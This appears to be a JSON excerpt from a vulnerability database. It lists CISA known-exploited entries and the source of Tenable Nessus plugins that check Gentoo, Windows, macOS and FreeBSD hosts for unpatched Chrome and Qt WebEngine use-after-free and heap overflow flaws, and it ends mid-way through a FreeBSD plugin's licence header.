"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-23T00:00:00", "type": "cisa_kev", "title": "Google Chrome Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-05-23T00:00:00", "id": "CISA-KEV-CVE-2019-13720", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chrome Heap Buffer Overflow in WebAudio Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21166", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:12:13", "description": "The remote host is affected by the vulnerability described in GLSA-202004-04 (Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of Qt WebEngine.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted media file in an application linked against Qt WebEngine, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "GLSA-202004-04 : Qt WebEngine: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:qtwebengine", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202004-04.NASL", "href": "https://www.tenable.com/plugins/nessus/135115", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202004-04.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135115);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13720\");\n script_xref(name:\"GLSA\", value:\"202004-04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"GLSA-202004-04 : Qt WebEngine: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202004-04\n(Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of\n Qt WebEngine.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file in an application linked against Qt WebEngine, possibly resulting in\n execution of arbitrary code with the privileges of the process or a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202004-04\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Qt WebEngine users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-qt/qtwebengine-5.14.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13720\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-qt/qtwebengine\", unaffected:make_list(\"ge 5.14.1\"), vulnerable:make_list(\"lt 5.14.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Qt WebEngine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:14", "description": "The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "nessus", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146948", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146948);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0117-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 89.0.4389.72 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1171049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1172054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111239\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1164846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174582\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1154250\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1158010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1146651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174943\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1175507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1182767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1049265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1105875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1131929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1100748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1153445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1155516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1165392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'89.0.4389.72', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:44:28", "description": "The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "nessus", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146949", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146949);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0117-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 89.0.4389.72 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1171049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1172054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111239\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1164846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174582\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1154250\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1158010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1146651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174943\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1175507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1182767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1049265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1105875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1131929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1100748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1153445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1155516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1165392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'89.0.4389.72', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:46:13", "description": "Chrome Releases reports :\n\nThis release includes 47 security fixes, including the below. Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild. Please see URL for details.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-05T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (f00b65d8-7ccb-11eb-b3be-e09467587c17)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/147152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 